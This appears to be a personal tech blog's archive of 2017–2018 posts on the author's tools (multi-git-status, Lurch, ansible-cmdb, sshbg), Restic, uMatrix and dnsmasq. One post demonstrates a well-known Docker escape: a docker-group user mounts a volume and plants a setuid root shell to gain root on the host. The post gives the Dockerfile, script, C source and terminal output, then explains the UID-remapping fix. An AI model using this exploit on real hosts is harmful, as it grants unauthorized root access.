Sunday, April 8th, 2018
Just a quick update on Multi-git-status. It now also shows branches with no upstream. These are typically branches created locally that haven't been configured to track a local or remote branch. Any changes in those branches are lost when the repo is removed from your machine. Additionally, multi-git-status now handles branches with slashes in them properly. For example, "feature/loginscreen". Here's how the output looks now:
You can get multi-git-status from the Github page.
Sunday, March 18th, 2018
Here's a very quick note:
I've been using the Restic backup tool with the SFTP backend for a while now, and so far it was great. Until I tried to prune some old backups. It takes two hours to prune 1 GiB of data from a 15 GiB backup. During that time, you cannot create new backups. It also consumes a huge amount of bandwidth when deleting old backups. I strongly suspect it downloads each blob from the remote storage backend, repacks it and then writes it back.
I've seen people on the internet with a few hundred GiB worth of backups having to wait 7 days to delete their old backups. Since the repo is locked during that time, you cannot create new backups.
This makes Restic completely unusable as far as I'm concerned. Which is a shame, because other than that, it's an incredible tool.
Sunday, March 4th, 2018
I cobbled together a unixy command / application launcher and auto-typer. I've dubbed it Lurch.
- Fuzzy filtering as-you-type.
- Execute commands.
- Open new browser tabs.
- Auto-type into currently focussed window
- Auto-type TOTP / rfc6238 / two-factor / Google Authenticator codes.
- Unixy and composable. Reads entries from stdin.
You can use and combine these features to do many things:
- Auto-type passwords
- Switch between currently opened windows by typing a part of its title (using wmctrl to list and switch to windows)
- As a generic (and very customizable) application launcher by parsing .desktop entries or whatever.
cd to parts of your filesystem using auto-type.
- Open browser tabs and search via google or specific search engines.
- List all entries in your SSH configuration and quickly launch an ssh session to one of them.
You'll need a way to launch it when you press a keybinding. That's usually the window manager's job. For XFCE, you can add a keybinding under the Keyboard -> Application Shortcuts settings dialog.
Here's what it looks like:
Unfortunately, due to time constraints, I cannot provide any support for this project:
NO SUPPORT: There is absolutely ZERO support on this project. Due to time constraints, I don't take bug or features reports and probably won't accept your pull requests.
You can get it from the Github page.
Sunday, March 4th, 2018
I've added an "-e" argument to my multi-git-status project. It hides repositories that have no unpushed, untracked or uncommitted changes.
And with the "-e" argument:
Saturday, March 3rd, 2018
I've just released ansible-cmdb v1.26. Ansible-cmdb takes the output of Ansible's fact gathering and converts it into a static HTML overview page containing system configuration information. It supports multiple templates (fancy html, txt, markdown, json and sql) and extending information gathered by Ansible with custom data.
This release includes the following features and improvements:
- Custom and host local facts are now sorted by name
- Updates in the python packages that ansible-cmdb depends on.
- Improvements to the uninstall procedures.
The following bug fixes were made:
- Fixes in how columns are displayed
- Fixes in how custom and host local facts are parsed and displayed.
- Fixes in the markdown template that prevented rendering if there were no host vars.
- Various fixes in the html_fancy templates
- Several fixes that prevented ansible-cmdb from properly working on systems with only Python v3.x
- Bug fix in the RPM package that prevented installation on some Redhat / Centos versions.
You can get the release from the releases page (available in .deb, .rpm, .tar.gz and .whl), or you can install it via Pip:
sudo pip install ansible-cmdb
For more info and installation methods, please check the repository at github.
Saturday, October 21st, 2017
Because the basics underlying the web are insecure-by-design, it is possible for browsers to make requests to any website in the world from any website you decide to visit. This of course was quickly picked up by content publishers, the media and advertisers alike, to track your every move on the internet in order to shove more lukewarm shit down the throats of the average consumer.
The rise and fall of ad blockers
The answer to this came in the form of Ad blockers: separate programs or extensions you install in your browser. They have a predefined list of ad domains that they'll block from loading. Naturally this upset the media and advertisers, some of whom equate it with stealing. One has to wonder if ignoring ads in the newspaper is also considered stealing. At any rate, it's hard to be sympathetic with the poor thirsty vampires in the advertising industry. They've shown again and again that they can't self-regulate their own actions. They'll go through great lengths to annoying you into buying their crap and violating your privacy in the most horrible ways, all for a few extra eyeballs *.
For example, CNN's site loads resources from a staggering 61 domains. That's 61 places that can track you. 30 of those are known to track you and include Facebook, Google, a variety of specialized trackers, ad agencies, etc. It tries to run over 40 scripts and tries to place 8 cookies. And this is only from allowing scripts! I did not allow cross-site background requests or any of the blocked domains. I'm sure if I unblocked those, there would be much, much more.
To top it all off, advertisers have decided to go to the root of the problem, and have simply bought most ad blockers. These were then modified to let through certain "approved" ads. The sales pitch they give us is that they'll only allow nonintrusive ads. Kinda like a fifty-times convicted felon telling the parole board that he'll truly be good this time. In some cases they've even built tracking software directly in the ad blockers themselves. In other cases they're basically extorting money from websites in exchange for letting their ads through.
Bringing out the big guns
So… our ad blockers are being taken over by the enemy. Our browsers are highly insecure by default. Every site can send and retrieve data from any place on the web. Browsers can use our cameras, microphones and GPUs. The most recent addition is the ability to show notifications on our desktops. A feature that, surprise surprise, was quickly picked up by sites to shove more of their crap in our faces. Things are only going to get worse as browsers get more and more access to our PCs. The media has shown that they don't give a rats ass about your privacy or rights as long as there's a few cents to make. The world's most-used browser is built by a company that lives off advertising. Have we lost the war? Do we just resign ourselves to the fact that we'll be tracked, spied upon, lied to, taken advantage of and spoon-fed advertisements like obedient little consumers every time we open a webpage?
Umatrix is like a firewall for your browser. It stops web pages from doing anything. They can't set cookies, they can't load CSS or images. They can't run scripts, use iframes or send data to themselves or to other sites. Umatrix blocks everything. Umatrix is what browsers should be doing by default. Ad blockers are just not enough. They only block ads and then only the ones they know about. To get any decent kind of protection of your privacy, you always needed at least an Adblocker, a privacy blocker such as Privacy Badger and a script blocker such as Noscript. Umatrix replaces all of those, and does a better job at it too.
Umatrix gives you full insight into what a website is trying to do. It gives you complete control over what a website is and isn't allowed to do. It has a bit of a learning curve, which is why I wrote a tutorial for it.
This is what a CNN article looks like with Umatrix enabled and only allows first-party (
*.cnn.com) CSS and images, which I have set as the default:
Look at that beauty. It's clean. It loads super fast. It cannnot track me. It's free of ads, pop-ups, auto playing videos, scripts and cookies. Remember, this didn't take any manual unblocking. This is just what it looks like out of the box with umatrix.
Umatrix makes the web usable again.
Get it, install it, love it
Get it for Firefox, Chrome or Opera. Umatrix is Open Source, so it cannot be bought out by ad agencies.
Read my tutorial to get started with umatrix, as the learning curve is fairly steep.
Thanks for reading and safe browsing!
*) Someone will probably bring up the whole "but content creators should / need / deserve money too!" argument again. I'm not interested in discussions about that. They've had the chance to behave, and they've misbehaved time and time again. At some point, you don't trust the pathological liars anymore. No content creator switched to a more decent ad provider that doesn't fuck its customers over. The blame is on them, not on the people blocking their tracking, spying, attention-grabbing shit. Don't want me looking at your content for free? Put up a paywall. People won't come to your site anymore if you did that? Then maybe your content wasn't worth money in the first place.
Saturday, October 14th, 2017
I've just released ansible-cmdb v1.23. Ansible-cmdb takes the output of Ansible's fact gathering and converts it into a static HTML overview page containing system configuration information. It supports multiple templates (fancy html, txt, markdown, json and sql) and extending information gathered by Ansible with custom data.
This release includes the following changes:
- group_vars are now parsed.
- Sub directories in host_vars are now parsed.
- Addition of a
--quiet switch to suppress warnings.
- Minor bugfixes and additions.
As always, packages are available for Debian, Ubuntu, Redhat, Centos and other systems. Get the new release from the Github releases page.
Saturday, September 30th, 2017
Disclaimer: There is no actual profit. That was just one of those clickbaity things everybody seems to like so much these days. Also, it's not really fun. Alright, on with the show!
A common practice is to add users that need to run Docker containers on your host to the docker group. For example, an automated build process may need a user on the target system to stop and recreate containers for testing or deployments. What is not obvious right away is that this is basically the same as giving those users root access. You see, the Docker daemon runs as root and when you add users to the docker group, they get full access over the Docker daemon.
So how hard is it to exploit this and become root on the host if you are a member of the
docker group? Not very hard at all…
uid=1000(fboender) gid=1000(fboender) groups=1000(fboender), 999(docker)
$ cd docker2root
$ docker build --rm -t docker2root .
$ docker run -v /tmp/persist:/persist docker2root:latest /bin/sh root.sh
uid=0(root) gid=1000(fboender) groups=1000(fboender),999(docker)
# ls -la /root
drwx------ 10 root root 4096 aug 1 10:32 .
drwxr-xr-x 25 root root 4096 sep 19 05:51 ..
-rw------- 1 root root 366 aug 3 09:26 .bash_history
So yeah, that took all of 3 seconds. I know I said 10 in the title, but the number 10 has special SEO properties. Remember, this is on the Docker host, not in a container or anything!
How does it work?
When you mount a volume into a container, that volume is mounted as root. By default, processes in a container also run as root. So all you have to do is write a setuid root owned binary to the volume, which will then appear as a setuid root binary on the host in that volume too.
Here's what the
Dockerfile looks like:
COPY root.sh root.sh
COPY rootshell rootshell
rootshell file is a binary compiled from the following source code (
setuid( 0 );
system( "/bin/sh" );
This isn't strictly needed, but most shells and many other programs refuse to run as a setuid binary.
The root.sh file simply copies the
rootshell binary to the volume and sets the setuid bit on it:
cp rootshell /persist/rootshell
chmod 4777 /persist/rootshell
Why I don't need to report this
I don't need to report this, because it is a well-known vulnerability. In fact, it's one of the less worrisome ones. There's plenty more including all kinds of privilege escalation vulnerabilities from inside container, etc. As far as I know, it hasn't been fixed in the latest Docker, nor will it be fixed in future versions. This is in line with the modern stance on security in the tech world: "security? What's that?" Docker goes so far as to call them "non-events". Newspeak if I ever heard it.
Some choice bullshit quotes from the Docker frontpage and documentation:
Secure by default: Easily build safer apps, ensure tamper-proof transit of all app components and run apps securely on the industry’s most secure container platform.
We want to ensure that Docker Enterprise Edition can be used in a manner that meets the requirements of various security and compliance standards.
Either that same courtesy does not extend to the community edition, security by default is no longer a requirement, or it's a completely false claim.
They do make some casual remarks about not giving access to the docker daemon to untrusted users in the Security section of the documentation:
only trusted users should be allowed to control your Docker daemon
However, they fail to mention that giving a user control of your Docker daemon is basically the same as giving them root access. Given that many companies are doing auto-deployments, and have probably given docker daemon access to a deployment user, your build server is now effectivaly also root on all your build slaves, dev, uat and perhaps even production systems.
Luckily, since Docker’s approach to secure by default through apparmor, seccomp, and dropping capabilities
3 seconds to get root on my host with a default Docker install doesn't look like "secure by default" to me. None of these options were enabled by default when I CURL-installed (!!&(@#!) Docker on my system, nor was I warned that I'd need to secure things manually.
How to fix this
There's a workaround available. It's hidden deep in the documentation and took me while to find. Eventually some StackExchange discussion pointed me to a concept known as UID remapping (subuids). This uses the Linux namespaces capabilities to map the user IDs of users in a container to a different range on the host. For example, if you're uid 1000, and you remap the UID to 20000, then the root user (uid 0) in the container becomes uid 20000, uid 1 becomes uid 20001, etc.
You can read about how to manually (because docker is secure by default, remember) configure that on the Isolate containers with a user namespace documentation page.
Saturday, September 23rd, 2017
This is gonna be a short post. I wrote a tool to change the background color of my terminal when I ssh to a machine. It works on Tilix and Xterm, but not most other terminals because they don't support the ANSI escape sequence for changing the background color. It works by combining SSH's LocalCommand option in combination with a small Python script that parses the given hostname. Here's a short gif of it in action:
It's called sshbg.
Tuesday, September 19th, 2017
It appears that by default, DNS query caching is disabled in dnsmasq on Ubuntu 16.04. At least it is for my Xubuntu desktop. You can check if it's disabled for you with the dig command:
$ dig @127.0.1.1 ubuntu.com
$ dig @127.0.1.1 ubuntu.com
Yes, run it twice. Once to add the entry to the cache, the second time to verify it's cached.
Now check the "
Query time" line. If it says anything higher than about 0 to 2 msec for the query time, caching is disabled.
;; Query time: 39 msec
To enable it, create a new file
/etc/NetworkManager/dnsmasq.d/cache.conf and put the following in it:
Next, restart the network manager:
systemctl restart network-manager
Now try the dig again twice and check the Query time. It should say zero or close to zero. DNS queries are now cached, which should make browsing a bit faster. In some cases a lot faster. An additional benifit is that many ISP's modems / routers and DNS servers are horrible, which local DNS caching somewhat mitigates.
The text of all posts on this blog, unless specificly mentioned otherwise, are licensed under this license.